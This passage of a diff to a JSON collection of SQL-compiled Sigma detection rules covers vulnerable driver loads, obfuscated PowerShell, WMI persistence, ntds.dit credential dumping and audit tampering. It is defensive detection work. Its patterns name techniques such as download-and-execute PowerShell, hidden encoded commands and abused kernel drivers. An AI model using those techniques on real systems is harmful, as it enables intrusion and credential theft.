'%\\\\dbk64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fiddrv64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\goad.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gametersafe.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mhyprot2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lenovodiagnosticsdriver.sys' ESCAPE '\\' OR 
ImageLoaded LIKE '%\\\\netflt.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bw.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntbios\\_2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbutil.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dh\\_kernel.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtkiow8x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\daxin\\_blank.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\superbmc.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nodedriver.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cpuz141.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gftkyj64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\4.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dh\\_kernel\\_10.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\naldrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winiodrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asmmap64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\smep\\_namco.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mhyprot.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iqvw64e.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nstr.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntiolib.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pciecubed.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vmdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\daxin\\_blank2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\atszio.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\agent64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cpupress.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\driver7-x86.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\krpocesshacker.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asrdrv102.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aswvmm.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tmcomm.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bs\\_def.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bsmi.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\alsysio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cpuz.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\daxin\\_blank1.sys' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\amifldrv64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rwdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\testbone.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winio64c.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winring0x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nt4.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\procexp.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\se64a.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\air\\_system10.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wantd.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wcpu.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nicm.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\daxin\\_blank6.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\kbdcap64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lctka.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nvflsh64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\phlashnt.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\viragt.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\atszio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbutil\\_2\\_3.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\phymemx64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wantd\\_4.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ndislan.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\panmonfltx64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\t3.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\panmonflt.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\daxin\\_blank3.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\smep\\_capcom.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wyproxy32.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\black.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vboxdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cpuz\\_x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\poortry.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mydrivers.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winio64a.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\openlibsys.sys' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\bs\\_flash64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vproeventmonitor.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\piddrv64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wantd\\_2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sysinfo.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asrdrv104.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netfilterdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\libnicm.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\driver7-x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\semav6msr.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pchunter.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asupio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtkio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rzpnk.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\magdrvamd64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\elrawdsk.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\amp.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asrautochkupddrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lgdcatcher.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fairplaykd.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\daxin\\_blank4.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtkiow10x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\citmdrv\\_ia64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nt5.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asromgdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nt2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asrdrv101.sys' ESCAPE '\\'))" ], - "filename": "win_system_service_install_pdqdeploy.yml" + "filename": "driver_load_win_vuln_drivers_names.yml" }, { - "title": "Invoke-Obfuscation STDIN+ Launcher - System", - "id": "72862bf2-0eb1-11eb-adc1-0242ac120002", + "title": "Suspicious Scripting in a WMI Consumer", + "id": "fe21810c-2a8c-478f-8dd3-5a287fb2a0e0", "status": "experimental", - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects suspicious commands that are related to scripting/powershell in WMI Event 
Consumers", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1059.005" ], "falsepositives": [ - "Unknown" + "Legitimate administrative scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%powershell%' ESCAPE '\\' AND (ImagePath LIKE '%/c%' ESCAPE '\\' OR ImagePath LIKE '%/r%' ESCAPE '\\')) AND (ImagePath LIKE '%noexit%' ESCAPE '\\' OR (ImagePath LIKE '%input%' ESCAPE '\\' AND ImagePath LIKE '%$%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID IN ('19', '20', '21') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Destination LIKE '%new-object%' ESCAPE '\\' AND Destination LIKE '%net.webclient%' ESCAPE '\\' AND Destination LIKE '%.downloadstring%' ESCAPE '\\') OR (Destination LIKE '%new-object%' ESCAPE '\\' AND Destination LIKE '%net.webclient%' ESCAPE '\\' AND Destination LIKE '%.downloadfile%' ESCAPE '\\') OR (Destination LIKE '% iex(%' ESCAPE '\\' OR Destination LIKE '%WScript.shell%' ESCAPE '\\' OR Destination LIKE '% -nop %' ESCAPE '\\' OR Destination LIKE '% -noprofile %' ESCAPE '\\' OR Destination LIKE '% -decode %' ESCAPE '\\' OR Destination LIKE '% -enc %' ESCAPE '\\') OR (Destination LIKE '%WScript.Shell%' ESCAPE '\\' OR Destination LIKE '%System.Security.Cryptography.FromBase64Transform%' ESCAPE '\\')))" ], - "filename": "win_system_invoke_obfuscation_stdin_services.yml" + "filename": "sysmon_wmi_susp_scripting.yml" }, { - "title": "smbexec.py Service Installation", - "id": "52a85084-6989-40c3-8f32-091e12e13f09", + "title": "WMI Event Subscription", + "id": "0f06a3a5-6a09-413f-8743-e6cf35561297", "status": "test", - "description": "Detects the use of smbexec.py tool by detecting a specific service installation", - "author": "Omer Faruk Celik", - "tags": [ - 
"attack.lateral_movement", - "attack.execution", - "attack.t1021.002", - "attack.t1569.002" - ], - "falsepositives": [ - "Unknown" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'BTOBTO' AND ImagePath LIKE '%\\\\execute.bat' ESCAPE '\\')" - ], - "filename": "win_system_hack_smbexec.yml" - }, - { - "title": "Invoke-Obfuscation RUNDLL LAUNCHER - System", - "id": "11b52f18-aaec-4d60-9143-5dd8cc4706b9", - "status": "experimental", - "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "falsepositives": [ - "Unknown" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%rundll32.exe%' ESCAPE '\\' AND ImagePath LIKE '%shell32.dll%' ESCAPE '\\' AND ImagePath LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND ImagePath LIKE '%powershell%' ESCAPE '\\')" - ], - "filename": "win_system_invoke_obfuscation_via_rundll_services.yml" - }, - { - "title": "OilRig APT Schedule Task Persistence - System", - "id": "53ba33fd-3a50-4468-a5ef-c583635cfa92", - "status": "experimental", - "description": "Detects OilRig schedule task persistence as reported by Nyotron in their March 2018 report", - "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "description": "Detects creation of WMI event subscription persistence method", + "author": "Tom Ueltschi (@c_APT_ure)", "tags": [ "attack.persistence", - "attack.g0049", - "attack.t1053.005", - "attack.s0111", - "attack.t1543.003", - "attack.defense_evasion", - "attack.t1112", - "attack.command_and_control", - "attack.t1071.004" - ], - "falsepositives": [ - "Unlikely" - ], - 
"level": "critical", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName IN ('SC Scheduled Scan', 'UpdatMachine'))" - ], - "filename": "win_system_apt_oilrig_mar18.yml" - }, - { - "title": "Remote Utilities Host Service Install", - "id": "85cce894-dd8b-4427-a958-5cc47a4dc9b9", - "status": "experimental", - "description": "Detects Remote Utilities Host service installation on the target system.", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.persistence" + "attack.t1546.003" ], "falsepositives": [ - "Legitimate use of the tool" + "Exclude legitimate (vetted) use of WMI event subscription in your network" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '%\\\\rutserv.exe%' ESCAPE '\\' AND ImagePath LIKE '%-service%' ESCAPE '\\') OR ServiceName = 'Remote Utilities - Host'))" + "SELECT * FROM logs WHERE (EventID IN ('19', '20', '21') AND Channel = 'Microsoft-Windows-Sysmon/Operational')" ], - "filename": "win_system_service_install_remote_utilities.yml" + "filename": "sysmon_wmi_event_subscription.yml" }, { - "title": "TacticalRMM Service Installation", - "id": "4bb79b62-ef12-4861-981d-2aab43fab642", + "title": "SyncAppvPublishingServer Bypass Powershell Restriction - PS Module", + "id": "fe5ce7eb-dad8-467c-84a9-31ec23bd644a", "status": "experimental", - "description": "Detects a TacticalRMM service installation. 
Tactical RMM is a remote monitoring & management tool.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions.", + "author": "Ensar Şamil, @sblmsrsn, OSCD Community", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Legitimate use of the tool" + "App-V clients" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath LIKE '%tacticalrmm.exe%' ESCAPE '\\' OR ServiceName LIKE '%TacticalRMM Agent Service%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ContextInfo LIKE '%SyncAppvPublishingServer.exe%' ESCAPE '\\')" ], - "filename": "win_system_service_install_tacticalrmm.yml" + "filename": "posh_pm_syncappvpublishingserver_exe.yml" }, { - "title": "Invoke-Obfuscation COMPRESS OBFUSCATION - System", - "id": "175997c5-803c-4b08-8bb0-70b099f47595", + "title": "Clear PowerShell History - PowerShell Module", + "id": "f99276ad-d122-4989-a09a-d00904a5f9d2", "status": "experimental", - "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", - "author": "Timur Zinniatullin, oscd.community", + "description": "Detects keywords that could indicate clearing PowerShell history", + "author": "Ilyas Ochkov, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1070.003" ], "falsepositives": [ - "Unknown" + "Legitimate PowerShell scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%new-object%' 
ESCAPE '\\' AND ImagePath LIKE '%text.encoding]::ascii%' ESCAPE '\\' AND ImagePath LIKE '%readtoend%' ESCAPE '\\' AND (ImagePath LIKE '%:system.io.compression.deflatestream%' ESCAPE '\\' OR ImagePath LIKE '%system.io.streamreader%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (((Payload LIKE '%Set-PSReadlineOption%' ESCAPE '\\' AND Payload LIKE '%–HistorySaveStyle%' ESCAPE '\\' AND Payload LIKE '%SaveNothing%' ESCAPE '\\') OR (Payload LIKE '%Set-PSReadlineOption%' ESCAPE '\\' AND Payload LIKE '%-HistorySaveStyle%' ESCAPE '\\' AND Payload LIKE '%SaveNothing%' ESCAPE '\\')) OR ((Payload LIKE '%del%' ESCAPE '\\' OR Payload LIKE '%Remove-Item%' ESCAPE '\\' OR Payload LIKE '%rm%' ESCAPE '\\') AND Payload LIKE '%(Get-PSReadlineOption).HistorySavePath%' ESCAPE '\\')))" ], - "filename": "win_system_invoke_obfuscation_via_compress_services.yml" + "filename": "posh_pm_clear_powershell_history.yml" }, { - "title": "KDC RC4-HMAC Downgrade CVE-2022-37966", - "id": "e6f81941-b1cd-4766-87db-9fc156f658ee", - "status": "experimental", - "description": "Detects the exploitation of a security bypass and elevation of privilege vulnerability with Authentication Negotiation by using weak RC4-HMAC negotiation", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Computer Machine Password by PowerShell", + "id": "e3818659-5016-4811-a73c-dde4679169d2", + "status": "test", + "description": "The Reset-ComputerMachinePassword cmdlet changes the computer account password that the computers use to authenticate to the domain controllers in the domain.\nYou can use it to reset the password of the local computer.\n", + "author": "frack113", "tags": [ - "attack.privilege_escalation" + "attack.initial_access", + "attack.t1078" ], "falsepositives": [ - "Unknown" + "Administrator PowerShell scripts" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs 
WHERE (Channel = 'System' AND EventID = '42' AND Provider_Name = 'Kerberos-Key-Distribution-Center' AND Level = '2')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ContextInfo LIKE '%Reset-ComputerMachinePassword%' ESCAPE '\\')" ], - "filename": "win_system_kdcsvc_rc4_downgrade.yml" + "filename": "posh_pm_susp_reset_computermachinepassword.yml" }, { - "title": "Suspicious Usage of CVE_2021_34484 or CVE 2022_21919", - "id": "52a85084-6989-40c3-8f32-091e12e17692", - "status": "experimental", - "description": "During exploitation of this vuln, two logs (providername:Microsoft-Windows-User Profiles Service) with eventid 1511 and 1515 (maybe lot of false positives with this event) are created. Moreover, it appears the directory \\Users\\TEMP is created may be created during the exploitation.Viewed on 2008 Server", - "author": "Cybex", + "title": "Suspicious Get-ADDBAccount Usage", + "id": "b140afd9-474b-4072-958e-2ebb435abd68", + "status": "test", + "description": "Detects suspicious invocation of the Get-ADDBAccount script that reads from a ntds.dit file and may be used to get access to credentials without using any credential dumpers", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution" + "attack.credential_access", + "attack.t1003.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1511' AND Provider_Name = 'Microsoft-Windows-User Profiles Service')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%Get-ADDBAccount%' ESCAPE '\\' AND Payload LIKE '%BootKey %' ESCAPE '\\' AND Payload LIKE '%DatabasePath %' ESCAPE '\\')" ], - "filename": "win_system_susp_vuln_cve_2022_21919_or_cve_2021_34484.yml" + "filename": "posh_pm_get_addbaccount.yml" }, { - "title": "PowerShell 
Scripts Installed as Services", - "id": "a2e5019d-a658-4c6a-92bf-7197b54e2cae", - "status": "test", - "description": "Detects powershell script installed as a Service", - "author": "oscd.community, Natalia Shornikova", + "title": "PowerShell Get Clipboard", + "id": "4cbd4f12-2e22-43e3-882f-bff3247ffb78", + "status": "experimental", + "description": "A General detection for the Get-Clipboard commands in PowerShell logs. This could be an adversary capturing clipboard contents.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.execution", - "attack.t1569.002" + "attack.collection", + "attack.t1115" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '%powershell%' ESCAPE '\\' OR ImagePath LIKE '%pwsh%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%Get-Clipboard%' ESCAPE '\\')" ], - "filename": "win_system_powershell_script_installed_as_service.yml" + "filename": "posh_pm_get_clipboard.yml" }, { - "title": "Turla PNG Dropper Service", - "id": "1228f8e2-7e79-4dea-b0ad-c91f1d5016c1", - "status": "test", - "description": "This method detects malicious services mentioned in Turla PNG dropper report by NCC Group in November 2018", - "author": "Florian Roth (Nextron Systems)", + "title": "Invoke-Obfuscation CLIP+ Launcher - PowerShell Module", + "id": "a136cde0-61ad-4a61-9b82-8dc490e60dd2", + "status": "experimental", + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.persistence", - "attack.g0010", - "attack.t1543.003" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + 
"Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'WerFaultSvc')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r).+clip(?:\\.exe)?.{0,4}&&.+clipboard]::\\(\\s\\\\\"\\{\\d\\}.+-f.+\"')" ], - "filename": "win_system_apt_turla_service_png.yml" + "filename": "posh_pm_invoke_obfuscation_clip.yml" }, { - "title": "Invoke-Obfuscation Via Use MSHTA - System", - "id": "7e9c7999-0f9b-4d4a-a6ed-af6d553d4af4", + "title": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell Module", + "id": "2f211361-7dce-442d-b78a-c04039677378", "status": "experimental", - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block cited in the reference section below", + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", "tags": [ "attack.defense_evasion", "attack.t1027", 
@@ -4177,1440 +3981,1493 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%mshta%' ESCAPE '\\' AND ImagePath LIKE '%vbscript:createobject%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (Payload REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR Payload REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR Payload REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR Payload REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR Payload REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR Payload REGEXP '\\$VerbosePreference\\.ToString\\(' OR Payload REGEXP '\\[String\\]\\s*\\$VerbosePreference'))" ], - "filename": "win_system_invoke_obfuscation_via_use_mshta_services.yml" + "filename": "posh_pm_invoke_obfuscation_obfuscated_iex.yml" }, { - "title": "MSSQL XPCmdshell Option Change", - "id": "d08dd86f-681e-4a00-a92c-1db218754417", + "title": "Potential Active Directory Enumeration Using AD Module - PsModule", + "id": "74176142-4684-4d8a-8b0a-713257e7df8e", "status": "experimental", - "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure setting is changed", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects usage of the \"Import-Module\" cmdlet to load the \"Microsoft.ActiveDirectory.Management.dl\" DLL. Which is often used by attackers to perform AD enumeration.", + "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "tags": [ - "attack.execution" + "attack.reconnaissance", + "attack.discovery", + "attack.impact" ], "falsepositives": [ - "Legitimate enable/disable of the setting", - "Note that since the event contain the change for both values. 
This means that this will trigger on both enable and disable" + "Legitimate use of the library for administrative activity" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '15457' AND Data LIKE '%xp\\_cmdshell%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (Payload LIKE '%Import-Module %' ESCAPE '\\' OR Payload LIKE '%ipmo %' ESCAPE '\\') AND Payload LIKE '%Microsoft.ActiveDirectory.Management.dll%' ESCAPE '\\')" ], - "filename": "win_mssql_xp_cmdshell_change.yml" + "filename": "posh_pm_active_directory_module_dll_import.yml" }, { - "title": "Ntdsutil Abuse", - "id": "e6e88853-5f20-4c4a-8d26-cd469fd8d31f", + "title": "Invoke-Obfuscation Via Use MSHTA - PowerShell Module", + "id": "07ad2ea8-6a55-4ac6-bf3e-91b8e59676eb", "status": "experimental", - "description": "Detects potential abuse of ntdsutil to dump ntds.dit database", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.execution" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate backup operation/creating shadow copies" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'ESENT' AND EventID IN ('216', '325', '326', '327') AND Data LIKE '%ntds.dit%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%set%' ESCAPE '\\' AND Payload LIKE '%&&%' ESCAPE '\\' AND Payload LIKE '%mshta%' ESCAPE '\\' AND Payload LIKE '%vbscript:createobject%' ESCAPE '\\' AND Payload LIKE '%.run%' ESCAPE '\\' 
AND Payload LIKE '%(window.close)%' ESCAPE '\\')" ], - "filename": "win_esent_ntdsutil_abuse.yml" + "filename": "posh_pm_invoke_obfuscation_via_use_mhsta.yml" }, { - "title": "MSSQL Disable Audit Settings", - "id": "350dfb37-3706-4cdc-9e2e-5e24bc3a46df", + "title": "Suspicious PowerShell Invocations - Generic - PowerShell Module", + "id": "bbb80e91-5746-4fbe-8898-122e2cafdbf4", "status": "experimental", - "description": "Detects when an attacker calls the \"ALTER SERVER AUDIT\" or \"DROP SERVER AUDIT\" transaction in order to delete or disable audit logs on the server", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious PowerShell invocation command parameters", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "This event should only fire when an administrator is modifying the audit policy. Which should be a rare occurrence once it's set up" + "Very special / sneaky PowerShell scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND (Data LIKE '%statement:ALTER SERVER AUDIT%' ESCAPE '\\' OR Data LIKE '%statement:DROP SERVER AUDIT%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ContextInfo LIKE '% -enc %' ESCAPE '\\' OR ContextInfo LIKE '% -EncodedCommand %' ESCAPE '\\' OR ContextInfo LIKE '% -ec %' ESCAPE '\\') AND (ContextInfo LIKE '% -w hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -window hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -windowstyle hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -w 1 %' ESCAPE '\\') AND (ContextInfo LIKE '% -noni %' ESCAPE '\\' OR ContextInfo LIKE '% -noninteractive %' ESCAPE '\\'))" ], - "filename": "win_mssql_disable_audit_settings.yml" + "filename": "posh_pm_susp_invocation_generic.yml" }, 
